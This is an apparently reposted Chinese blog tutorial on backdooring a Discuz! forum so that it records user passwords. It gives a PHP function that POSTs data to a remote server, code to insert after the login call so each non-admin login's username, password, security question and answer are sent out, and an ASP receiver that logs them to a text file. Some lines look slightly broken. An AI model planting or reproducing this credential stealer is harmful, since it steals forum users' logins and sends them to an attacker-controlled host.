天天看点
返回

dz记录密码(xxbing)

<a href="http://www.80pentest.com/?p=835">http://www.80pentest.com/?p=835</a>

DZ记录密码,我自己做了份代码。

include/common.inc.php 里面插一个自定义函数。

我选择放在 41-53行。dz7.1-72 include/login.func.php (49-51行) | dz7.0 是在根目录的logging.php

<a href="#viewSource">view source</a>

<code>01</code>

<code>function</code> <code>request_by_other(</code><code>$remote_server</code><code>,</code><code>$post_string</code><code>){</code>

<code>02</code>

<code>    </code><code>$context</code> <code>=</code><code>array</code><code>(</code>

<code>03</code>

<code>        </code><code>'http'</code><code>=&gt;</code><code>array</code><code>(</code>

<code>04</code>

<code>            </code><code>'method'</code><code>=&gt;</code><code>'POST'</code><code>,</code>

<code>05</code>

<code>            </code><code>'header'</code><code>=&gt;</code><code>'Content-type: application/x-www-form-urlencoded'</code><code>.</code><code>"/r/n"</code><code>.</code>

<code>06</code>

<code>                      </code><code>'User-Agent : xxbing/'s fuckyou!!!'</code><code>.</code><code>"/r/n"</code><code>.</code>

<code>07</code>

<code>                      </code><code>'Content-length: '</code><code>.</code><code>strlen</code><code>(</code><code>$post_string</code><code>)+8,</code>

<code>08</code>

<code>            </code><code>'content'</code><code>=&gt;</code><code>'mypost='</code><code>.</code><code>$post_string</code><code>)</code>

<code>09</code>

<code>        </code><code>);</code>

<code>10</code>

<code>    </code><code>$stream_context</code> <code>= stream_context_create(</code><code>$context</code><code>);</code>

<code>11</code>

<code>    </code><code>$data</code> <code>=</code><code>file_get_contents</code><code>(</code><code>$remote_server</code><code>,FALSE,</code><code>$stream_context</code><code>);</code>

<code>12</code>

<code>    </code><code>return</code> <code>$data</code><code>;</code>

<code>13</code>

<code>}</code>

找到根目录下的 logging.php文件。搜索下面代码。

<code>1</code>

<code>$ucresult</code> <code>= uc_user_login(</code><code>$username</code><code>,</code><code>$password</code><code>,</code><code>$loginfield</code> <code>==</code><code>'uid'</code><code>);</code>

然后在后面插上下面的代码:

<code>if</code><code>(</code><code>$username</code><code>!=</code><code>'admin'</code><code>){</code>

<code>2</code>

<code>        </code><code>$showtime</code><code>=</code><code>gmdate</code><code>(</code><code>"Ynj H:i:s"</code><code>,time()+8*3600);</code>

<code>3</code>

<code>                </code><code>if</code><code>(</code><code>$answer</code><code>==</code><code>''</code><code>){</code>

<code>4</code>

<code>                </code><code>$answer</code><code>=</code><code>'无!'</code><code>;</code>

<code>5</code>

<code>                </code><code>}</code>

<code>6</code>

<code>        </code><code>//name1无用。但是必须加</code>

<code>7</code>

<code>        </code><code>$post_string</code> <code>=</code><code>'name1='</code><code>.</code><code>$name2</code><code>.</code><code>'&amp;name='</code><code>.</code><code>$username</code><code>.</code><code>'&amp;password='</code><code>.</code><code>$password</code><code>.</code><code>'&amp;questionid='</code><code>.</code><code>$questionid</code><code>.</code><code>'&amp;answer='</code><code>.</code><code>$answer</code><code>.</code><code>'&amp;showtime='</code><code>.</code><code>$showtime</code><code>.</code><code>'&amp;from='</code><code>.</code><code>$_SERVER</code><code>[</code><code>'SERVER_NAME'</code><code>];</code>

<code>8</code>

<code>9</code>

<code>                                                </code><code>}</code>

因为我熟悉asp,所以接受端我用asp写的。

asp代码如下:

<code>&lt;%</code>

<code>'接收文件</code>

<code>'body0 = request.form(</code><code>"name1"</code><code>)</code>

<code>body1 = request.form(</code><code>"name"</code><code>)</code>

<code>body2 = request.form(</code><code>"password"</code><code>)</code>

<code>body3 = request.form(</code><code>"questionid"</code><code>)</code>

<code>body4 = request.form(</code><code>"answer"</code><code>)</code>

<code>body5 = request.form(</code><code>"showtime"</code><code>)</code>

<code>body7 = request.form(</code><code>"from"</code><code>)</code>

<code>body6 =</code><code>"账号:"</code><code>&amp;body1 &amp;</code><code>"---密码:"</code><code>&amp; body2 &amp;</code><code>"---问题ID:"</code><code>&amp; body3 &amp;</code><code>"---答案:"</code><code>&amp; body4 &amp;</code><code>"---时间:"</code><code>&amp; body5 &amp;</code><code>"---来源:"</code> <code>&amp; body7</code>

<code>'response.write body6</code>

<code>FileName =</code><code>date</code><code>()&amp;</code><code>".txt"</code>

<code>'这里之所以要替换,是为了兼容IIS7的环境。</code>

<code>14</code>

<code>FileName = Replace(FileName,</code><code>"/"</code><code>,</code><code>"-"</code><code>)</code>

<code>15</code>

<code>if</code> <code>body6 &lt;&gt;</code><code>""</code> <code>then</code>

<code>16</code>

<code>Call CreateFile(body6,FileName)</code>

<code>17</code>

<code>end</code> <code>if</code>

<code>18</code>

<code>Sub CreateFile(body,FileName)</code>

<code>19</code>

<code>Dim fso, tf ,cf</code>

<code>20</code>

<code>Set fso = CreateObject(</code><code>"Scripting.FileSystemObject"</code><code>)</code>

<code>21</code>

<code>Set tf = fso.openTextFile(server.mappath(FileName),8,True,0)</code>

<code>22</code>

<code>tf.WriteLine body</code>

<code>23</code>

<code>tf.WriteLine</code><code>"----------------"</code>

<code>24</code>

<code>tf.Close</code>

<code>25</code>

<code>set fso = nothing</code>

<code>26</code>

<code>End</code> <code>Sub</code>

<code>27</code>

<code>%&gt;</code>

.net php 数据安全/隐私保护 数据隐私保护 大数据隐私保护 大数据管理隐私保护 域名隐私保护备案 dba信息收集脚本
上一篇: Windows中的LCS
下一篇: WORDPRESS后台拿SHELL的方法

继续阅读